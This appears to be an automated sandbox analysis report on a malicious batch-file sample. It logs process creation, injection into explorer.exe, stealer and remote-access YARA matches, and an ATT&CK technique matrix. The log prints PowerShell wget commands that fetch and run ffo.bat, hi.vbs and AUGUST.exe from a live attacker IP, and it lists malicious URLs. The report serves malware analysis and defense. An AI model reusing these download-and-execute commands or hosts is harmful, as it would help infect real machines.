                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E79C0Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 2C00000Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E79C0Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 2950000Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E79C0Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 2EB0000Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.batJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\Users\user\AppData\Roaming/hi.vbsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\AUGUST.exe C:\Users\user\AppData\Roaming/AUGUST.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeProcess created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 14_2_0040D72E cpuid 14_2_0040D72E
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,14_2_00401F9D
                      Source: C:\Users\user\DZIPR.exeCode function: GetLocaleInfoA,15_2_6FA84DBC
                      Source: C:\Users\user\DZIPR.exeCode function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,15_2_6FA689B5
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: GetLocaleInfoA,16_2_6C554DBC
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,16_2_6C5389B5
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: GetLocaleInfoA,20_2_6FD24DBC
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,20_2_6FD089B5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 14_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,14_2_00401626
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA7D72B __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,15_2_6FA7D72B
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 14_2_00404FAA GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,14_2_00404FAA
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5900, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4016, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1488, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4256, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5972, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5900, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4016, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1488, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4256, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5972, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPED
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information112
                      Scripting
                      Valid Accounts2
                      Native API
                      112
                      Scripting
                      1
                      Abuse Elevation Control Mechanism
                      1
                      Deobfuscate/Decode Files or Information
                      1
                      Input Capture
                      2
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      11
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Exploitation for Client Execution
                      11
                      DLL Side-Loading
                      11
                      DLL Side-Loading
                      1
                      Abuse Elevation Control Mechanism
                      LSASS Memory3
                      File and Directory Discovery
                      Remote Desktop Protocol1
                      Input Capture
                      1
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      311
                      Process Injection
                      2
                      Obfuscated Files or Information
                      Security Account Manager145
                      System Information Discovery
                      SMB/Windows Admin SharesData from Network Shared Drive1
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      PowerShell
                      2
                      Registry Run Keys / Startup Folder
                      1
                      Scheduled Task/Job
                      11
                      DLL Side-Loading
                      NTDS121
                      Security Software Discovery
                      Distributed Component Object ModelInput Capture121
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
                      Registry Run Keys / Startup Folder
                      131
                      Masquerading
                      LSA Secrets1
                      Process Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                      Virtualization/Sandbox Evasion
                      Cached Domain Credentials31
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
                      Process Injection
                      DCSync11
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1518340 Sample: 55Ka50lb6Z.bat Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 102 Found malware configuration 2->102 104 Malicious sample detected (through community Yara rule) 2->104 106 Antivirus detection for dropped file 2->106 108 8 other signatures 2->108 13 cmd.exe 1 2->13         started        16 DZIPR.exe 1 2->16         started        18 DZIPR.exe 1 2->18         started        20 svchost.exe 1 1 2->20         started        process3 dnsIp4 142 Wscript starts Powershell (via cmd or directly) 13->142 23 cmd.exe 3 2 13->23         started        25 powershell.exe 14 16 13->25         started        30 powershell.exe 16 13->30         started        32 conhost.exe 13->32         started        144 Maps a DLL or memory area into another process 16->144 146 Found direct / indirect Syscall (likely to bypass EDR) 16->146 34 cmd.exe 2 16->34         started        36 cmd.exe 2 18->36         started        98 127.0.0.1 unknown unknown 20->98 signatures5 process6 dnsIp7 38 wscript.exe 1 23->38         started        41 conhost.exe 23->41         started        100 172.94.3.25, 49711, 49714, 49715 VOXILITYGB United States 25->100 86 C:\Users\user\AppData\Roaming\ffo.bat, DOS 25->86 dropped 136 Powershell drops PE file 25->136 88 C:\Users\user\AppData\Roaming\hi.vbs, ASCII 30->88 dropped 90 C:\Users\user\AppData\Local\Temp\yigmovm, PE32 34->90 dropped 138 Injects code into the Windows Explorer (explorer.exe) 34->138 140 Writes to foreign memory regions 34->140 43 conhost.exe 34->43         started        45 explorer.exe 34->45         started        92 C:\Users\user\AppData\Local\Temp\vqqcre, PE32 36->92 dropped 47 conhost.exe 36->47         started        49 explorer.exe 36->49         started        file8 signatures9 process10 signatures11 118 Wscript starts Powershell (via cmd or directly) 38->118 120 Windows Scripting host queries suspicious COM object (likely to drop second stage) 38->120 122 Suspicious execution chain found 38->122 51 cmd.exe 1 38->51         started        process12 signatures13 116 Wscript starts Powershell (via cmd or directly) 51->116 54 AUGUST.exe 6 51->54         started        58 powershell.exe 17 51->58         started        60 conhost.exe 51->60         started        process14 file15 80 C:\Users\user\DZIPR.exe, PE32 54->80 dropped 82 C:\Users\user\DZIPR.dll, PE32 54->82 dropped 132 Drops PE files to the user root directory 54->132 62 DZIPR.exe 5 54->62         started        84 C:\Users\user\AppData\Roaming\AUGUST.exe, PE32 58->84 dropped signatures16 process17 file18 94 C:\Users\user\AppData\Roaming\...\DZIPR.exe, PE32 62->94 dropped 96 C:\Users\user\AppData\Roaming\...\DZIPR.dll, PE32 62->96 dropped 148 Switches to a custom stack to bypass stack traces 62->148 150 Found direct / indirect Syscall (likely to bypass EDR) 62->150 66 DZIPR.exe 1 62->66         started        signatures19 process20 signatures21 110 Maps a DLL or memory area into another process 66->110 112 Switches to a custom stack to bypass stack traces 66->112 114 Found direct / indirect Syscall (likely to bypass EDR) 66->114 69 cmd.exe 5 66->69         started        process22 file23 78 C:\Users\user\AppData\Local\Temp\mdvbfllr, PE32 69->78 dropped 124 Injects code into the Windows Explorer (explorer.exe) 69->124 126 Writes to foreign memory regions 69->126 128 Found hidden mapped module (file has been removed from disk) 69->128 130 Switches to a custom stack to bypass stack traces 69->130 73 explorer.exe 69->73         started        76 conhost.exe 69->76         started        signatures24 process25 signatures26 134 Switches to a custom stack to bypass stack traces 73->134

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\vqqcre100%AviraBDS/Backdoor.Gen
                      C:\Users\user\AppData\Local\Temp\mdvbfllr100%AviraBDS/Backdoor.Gen
                      C:\Users\user\AppData\Local\Temp\yigmovm100%AviraBDS/Backdoor.Gen
                      C:\Users\user\AppData\Local\Temp\vqqcre100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\mdvbfllr100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\yigmovm100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe0%ReversingLabs
                      C:\Users\user\DZIPR.exe0%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://www.symauth.com/cps0(0%URL Reputationsafe
                      https://g.live.com/odclientsettings/Prod1C:0%Avira URL Cloudsafe
                      http://172.94.3.25/AUGUST.exe0%Avira URL Cloudsafe
                      https://www.datanumen.com/zip-repair/0%Avira URL Cloudsafe
                      http://www.vmware.com/00%Avira URL Cloudsafe
                      http://172.94.3.25/hi.vbs0%Avira URL Cloudsafe
                      http://172.94.3.25/ffo.bat0%Avira URL Cloudsafe
                      fullimmersion777.com0%Avira URL Cloudsafe
                      https://www.digicert.c0%Avira URL Cloudsafe
                      http://www.info-zip.org/0%Avira URL Cloudsafe
                      http://www.symauth.com/rpa000%Avira URL Cloudsafe
                      https://g.live.com/odclientsettings/ProdV21C:0%Avira URL Cloudsafe
                      http://www.vmware.com/0/0%Avira URL Cloudsafe
                      http://c0rl.m%L0%Avira URL Cloudsafe
                      http://www.repairfile.com0%Avira URL Cloudsafe
                      http://support.datanumen.com0%Avira URL Cloudsafe
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      http://172.94.3.25/hi.vbstrue
                      • Avira URL Cloud: safe
                      unknown
                      http://172.94.3.25/AUGUST.exetrue
                      • Avira URL Cloud: safe
                      unknown
                      http://172.94.3.25/ffo.battrue
                      • Avira URL Cloud: safe
                      unknown
                      fullimmersion777.comtrue
                      • Avira URL Cloud: safe
                      unknown
